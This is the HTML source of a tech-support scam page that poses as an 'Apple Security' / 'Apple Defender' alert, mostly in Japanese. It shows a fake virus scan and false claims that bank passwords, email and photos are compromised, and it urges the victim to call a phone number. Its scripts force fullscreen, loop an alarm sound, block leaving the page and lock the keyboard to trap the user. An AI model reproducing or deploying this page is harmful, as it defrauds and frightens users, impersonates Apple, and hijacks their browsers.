<!DOCTYPE html>
<html>
<head>

  <!-- Required meta tags -->
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<title>Apple-Support assistance</title>
<link rel="stylesheet" href="styles.css">
<script type="text/javascript" src="scripts.js"></script>
<script type="text/javascript" src="custom.js"></script>
<link rel="icon" type="image/png" href="apple.png">
<link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0-alpha1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-GLhlTQ8iRABdZLl6O3oVMWSktQOp6b7In1Zl3/Jr59b6EGGoI1aFkw7cmDA6j6gD" crossorigin="anonymous">
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js" integrity="sha384-B4gt1jrGC7Jh4AgTPSdUtOBvfO8shuf57BaghqFfPlYxofvL8/KUEfYiJOMMV+rV" crossorigin="anonymous"></script>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">


<!-- Google tag (gtag.js) -->
<script async src="https://www.googletagmanager.com/gtag/js?id=UA-xxx-x"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'UA-xxx-x');
</script>

<style>
  .black {
    width: 100%;
    height: 100%;
    background-color: rgb(0 0 0 / 47%);
    opacity: 0.7;
    transition: 1s;
    position: absolute;
    top: -190px;
    left:0
  }
  </style>



  <script>
  var elem = document.documentElement;
  function openFullscreen() {
    if (elem.requestFullscreen) {
      elem.requestFullscreen();
    } else if (elem.webkitRequestFullscreen) { /* Safari */
      elem.webkitRequestFullscreen();
    } else if (elem.msRequestFullscreen) { /* IE11 */
      elem.msRequestFullscreen();
    }
  }

  function closeFullscreen() {
    if (document.exitFullscreen) {
      document.exitFullscreen();
    } else if (document.webkitExitFullscreen) { /* Safari */
      document.webkitExitFullscreen();
    } else if (document.msExitFullscreen) { /* IE11 */
      document.msExitFullscreen();
    }
  }
  </script>

<script type="text/javascript">
window.onbeforeunload = function() {
   if (data_needs_saving()) {
       return "Windowsを呼び出す ディフェンダー 今すぐヘルプライン";
   } else {
      return;
   }
};
        </script>
        <script type="text/javascript">
            window.addEventListener("beforeunload", function (e) {
         var confirmationMessage = 'It looks like you are editing something.'
                            + 'Your changes will be lost if you leave before saving.';

                (e || window.event).returnValue = confirmationMessage; //Gecko + IE
                return confirmationMessage; //Gecko + Webkit, Safari, Chrome etc.
            });
        </script>

</head>
<body id="mycanvas" onclick="playSound()" >

  <div class="bg" style="cursor:none;">
    <div class="bgimg" style="top: 0px;"><img src="bg.png" alt="" width="100%"/></div>

</div>
  <a  onclick="openFullscreen();" rel="noreferrer" id="link_black" style="">
    <div class="black" style="height: 145%;"></div>
</a>

<div class="box" id="box">
<div class="top">
<p style="font-size: 17px; font-weight:600; font-family: Arial, Helvetica, sans-serif;">Apple Security<img src="minimize.jpeg" class="" style="float: right; width:115px;"></p>
</div>

<h4 style="position: absolute; left: 70px; top: 53px; font-weight: 300;" id="text1">Safety at a glance</h4>
<p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px;" id="text2"><br>Check what is happening to the safety and health of your device and take all necessary measures.</p>
<div class="centerright">
<ul>
<li>
<br>
<img src="kxFy-clip.png" width="50px;">
<p>Apple Security Protection</p>
<p style="top: 103px; position: absolute; font-size: 13px; color: grey;">action is required. Run a scan to check for <br>threats.</p>

</li>
<li>
<br><br>
<img src="qsbs-firewall.png" width="60px;">
<p>Firewall and network protection</p>
<p style="top: 270px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
</li>
</ul>
<ul>
<li>
<br>
<img src="s-S4-acc.png" width="60px;">
<p>Account protection</p>
<p style="top: 125px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
</li>
<li>
<br>
<img src="Z5BR-network.png" width="51px;"/>
<p>Application and browser control</p>
<p style="top: 270px; position: absolute; font-size: 13px; color: grey;">No action required.</p>
</li>
</ul>
</div>
<img src="uZbx-si.png" class="" style="border-bottom-left-radius: 10px;" width="30.9px; height: 15.2px;" id="clscl">
<br>
</div>


<!--Apple Security Quick Scan-->
<div class="scan" id="scan">
  <div class="top">
  <p style="font-size: 17px; font-weight:600; font-family: Arial, Helvetica, sans-serif;">Apple Security<img src="minimize.jpeg" class="" style="float: right; width:115px;"></p>
  </div>
  <h4 style="position: absolute; left: 70px; top: 53px; font-weight: 300;" id="text1"><img src="apple.png" width="25px;" style="margin-right: 10px;vertical-align: sub;">Apple Security Protection</h4>
  <p style="position: absolute; left: 70px; top: 100px; font-weight: 0; font-size: 13px;" id="text2">Device protection against threats.</p>

<h3 style="    position: absolute;
right: 150px;
top: 6px;
font-weight: 500;
font-size: 19px;" id="text12"><b>+1-000-000-0000  (無料セキュリティ)</b></h3>

  <div class="centerright">


  <ul>
  <li>



  <div class="flex"> <img src="-EBq-current.png" width="20px" height="20px;" style="margin-right: 10px; top: 10px; position: absolute;"><p style="font-weight: 400; position: absolute; left: 30px;">current threat</p></div>


  <br><br>
  <div class="progress" id="bar">
    <div class="progress__bar"></div>
  </div>

  <p style="font-size: 13px;" id="info">Quick scan in progress...<br>推定残り時間 <n id="time">0</b></n><br><n id="amount">0</b>< /n> スキャンされたファイル</p>

  <a href="#"class="button" id="re">キャンセルする</a>
  <p style=" font-size: 13px;" id="recx">私たちがあなたのデバイスを分析している間、作業を続けてください。</p>

  <p style="font-size: 13px; color: #0063c6; cursor: pointer;" id="recx-hide">保護履歴</p>
  <br>
  <p id="shx" style="font-size: 13px; color: #0063c6; display: none; cursor: pointer;">スキャンオプション<br> 許可された脅威<br> 保護履歴</p>


  </li>

  <li>

<div class="flex"><img src="nOxp-sett.png" height="28px" width="30px;" style="margin-right: 10px;"><p style="position: absolute; left: 35px;    bottom: 117px;    line-height: 18px;">ウイルスと脅威の保護設定 </p> </div>
<p style="color: grey; font-size: 13px;">特になし</p>
<p style="font-size: 13px; color: #0063c6;">設定の管理</p>
  </li>
  </ul>
  <ul>

  <li>


  <p style="position: absolute; top: -55px;">質問がありますか？</p>

  <p style="font-size: 13px; color: #0063c6; position: absolute; top: -15px; cursor: pointer;">get help</p>

  </li>
  <li>


    <p style="position: absolute; top: 25px;">誰が私を守ってくれるの？</p>

    <p style="font-size: 13px; color: #0063c6; position: absolute; top: 65px; cursor: pointer;">サプライヤー管理</p>

    </li>
    <li>


      <p style="position: absolute; top: 100px; "><br>アップルのセキュリティ向上にご協力ください</p>

      <p style="font-size: 13px; color: #0063c6; position: absolute; top: 152px; cursor: pointer;">ご意見をお寄せください</p>

      </li>
      <li>

        <p style="position: absolute; top: 190px;">プライバシー設定の変更</p>
        <p style="position: absolute; top: 220px; font-size: 13px;">Macでのプライバシー設定の表示と変更<br><n id="which"></b></n> devices.</p>

        <p style="font-size: 13px; color: #0063c6; position: absolute; top: 270px; cursor: pointer;">プライバシー設定<br>プライバシーダッシュボード<br>プライバシーステートメント</p>

        </li>

  </ul>

  </div>
  <img src="uZbx-si.png" class="" style="border-bottom-left-radius: 10px;" width="30.9px; height: 15.2px;" id="clscl">
  <br>
  </div>
  <script>
          navigator.userAgentData.getHighEntropyValues(["platformVersion"])
   .then(ua => {
     if (navigator.userAgentData.platform === "Apple") {
       const majorPlatformVersion = parseInt(ua.platformVersion.split('.')[0]);
       if (majorPlatformVersion >= 13) {
        document.getElementById("which").innerHTML = " 11";
        }
        else if (majorPlatformVersion > 0) {
          document.getElementById("which").innerHTML = " 10";
        }
        else {
          console.log("Beyond");
        }
     }
     else {
       console.log("does not work on Mac");
     }
   });
  </script>






<div class="alert_popup cardcontainer lightbox">
    <div class="container">
        <div class="row">
            <div class="col-md-12">
                <p class="text-center" style="    font-size: 16px;
font-weight: normal;
margin: 0;
margin-bottom: 5px;
padding: 5px 10px;
color: #fff;font-weight: bold;
margin-top: 8px; text-align: center;">Apple Security - 保護に関する警告</p>
                <p class="text-center">** この PC へのアクセスはセキュリティ上の理由でブロックされています。
                <p>あなたのコンピュータは不明なエラーコードに感染していると警告されました： #0x6D9。以下のデータが侵害されました： <br><br>
                  > メールアドレス<br> &gt; 銀行パスワード<br>
                  > Facebookログイン<br>
                  > 写真と写真書類 </p>

                  <p>Apple Securityのスキャンにより、このデバイス上でパスワード、オンラインID、財務情報、個人ファイル、画像、ドキュメントを盗む可能性のある不要なアドウェアが検出されました。 </p>
                  <!-- <p>Please contact us immediately so that our engineers can explain the removal process over the phone. <br><br> -->

                   <p> この脅威を報告し、なりすましを防止し、このデバイスへのアクセスをロック解除するために、直ちにAppleサポートにご連絡ください。 <br><br>
                    このmacを閉じると、個人情報が危険にさらされ、macの登録が中断されます。</p>

               <p style="padding-bottom: 0px;">アップルサポートに電話する <strong>+1-000-000-0000  (セキュリティサポート)</strong></p>
               <div class="action_buttons"> <a class="" id="leave_page" style="cursor: pointer;">理解した</a> <a class="" id="leave_page">キャンセルする</a> </div>
            </div>

        </div>
    </div>
</div>
<audio id="beep" loop>
  <source src="_Fm7-alert.mp3" type="audio/mpeg">
</audio>

<script>
  addEventListener("click", function() {
var el = document.documentElement
  , rfs =
         el.requestFullScreen
      || el.webkitRequestFullScreen
      || el.mozRequestFullScreen
;
rfs.call(el);
});

</script>

<div id="lst" class="lst lightbox">
  <div class="ilb top">
      <div class="headers ilb" style="border-bottom: 1px solid #d6d5d5;">
          <span id="txtadd" class="fl title"><span class="fl ilb"><img src="apple.png" class="logo3"></span> Apple Defenderセキュリティセンター</span>
          <span id="txts1" class="fl title2"><a href="#"><img src="cross.png"></a></span>

      </div>
  </div>
  <div id="txtintro">
              <span class="colo-rd">App: Ads.financetrack(x07).dll<br>
                Threats Detected:Stuxnet. Unknown Error code: #0x6D09</span>
  </div>
  <img id="banner" src="virus-images.png">
  <div id="disclaimer">
    このPCへのアクセスはセキュリティ上の理由でブロックされています。<br>
      <span class="support">Apple サポートにお問い合わせください： +1-000-000-0000  (セキュリティサポート)</span>
  </div>
  <div id="bottom">
      <img id="badge" src="apple.png"><span class="title3">Apple Support</span>
      <ul>
          <li>
              <a href="#">
                  <div class="fr button2">
                      <span id="addtochromebutton">いいえ</span>
                  </div>
              </a>
          </li>
          <li>
              <a href="#">
                  <div class="fr buttons blink">
                      <span id="addtochromebutton">はい</span>
                  </div>
              </a>
          </li>
      </ul>

  </div>
</div>

</div>

<div id="footer" style="bottom: 0; position: absolute; cursor: none;width: auto;overflow: hidden;">
  <div class="row">

      <div class="col-md-12">
          <div class="right-foot" style="text-align: center;">
              <span id="footertxt" style="font-weight: 700;"><img src="apple.png"> Apple</span><span style="font-weight: 700;padding-left: 5px;color: #fff;">サポート窓口 <span style="border: 1px solid #fff;border-radius: 5px;padding: 2px 5px;">+1-000-000-0000  (セキュリティサポート)</span></span>
          </div>
      </div>
      <div class="col-md-12">
          <marquee width="100%" direction="left" height="100px"><small class="text-left" style="color: #eee;font-size: 10px;">アップル
            Defender SmartScreenは、認識されないアプリが表示されるのを防ぎます。このアプリを実行すると
            を危険にさらす可能性があります。Apple Defender Scanは、このデバイス上で以下の情報を盗む可能性のある不要なアドウェアを検出しました。
            パスワード、オンラインID、金融情報、個人的なファイル、写真、またはドキュメントを盗む可能性のある不要なアドウェアが検出されました。
            ドキュメントを盗み出す可能性があります。</small></marquee>
      </div>
  </div>


</div>

<div id="welcomeDiv"
     style=" display:none; background-color:#000; height: auto; width: 550px;left:32%;position: absolute;z-index: 9999999999;text-align: center;top: 0; "
     class="answer_list">
    <p class="text-center" style="color: #FEFEFE;  margin-top:10px; font-size: 16px; opacity:.9; ">コンピュータを再起動したり、使用したりしないでください。
      コンピュータを<br>Your computer is disabled. Please, アップルサポートに電話する. <br>アクセスはこの
      コンピュータに <br>すぐにご連絡ください。技術者が問題解決のお手伝いをいたします。</p>


</div>

<script>
  $(document).ready(function () {
      $("#mycanvas").click(function () {
          $("#welcomeDiv").show();
      });
  });
</script>

<script>
navigator.keyboard.lock();
document.onkeydown = function (e) {
return false;
}
</script>

<!-- Hitsteps TRACKING CODE - Manual 2023-01-11 - DO NOT CHANGE -->
<script type="text/javascript">(function(){var hstc=document.createElement('script'); hstc.src='https://cdnhst.xyz/code?code=8e6759d66d268097eb8f73e208820252';hstc.async=true;var htssc = document.getElementsByTagName('script')[0];htssc.parentNode.insertBefore(hstc, htssc);})();
</script><noscript><a href="http://www.hitsteps.com/"><img src="//cdnhst.xyz/code?mode=img&amp;code=8e6759d66d268097eb8f73e208820252" alt="website tracking software" width="1" height="1" />blog tracking</a></noscript>
<!-- Hitsteps TRACKING CODE - DO NOT CHANGE -->
 </body>


</html>
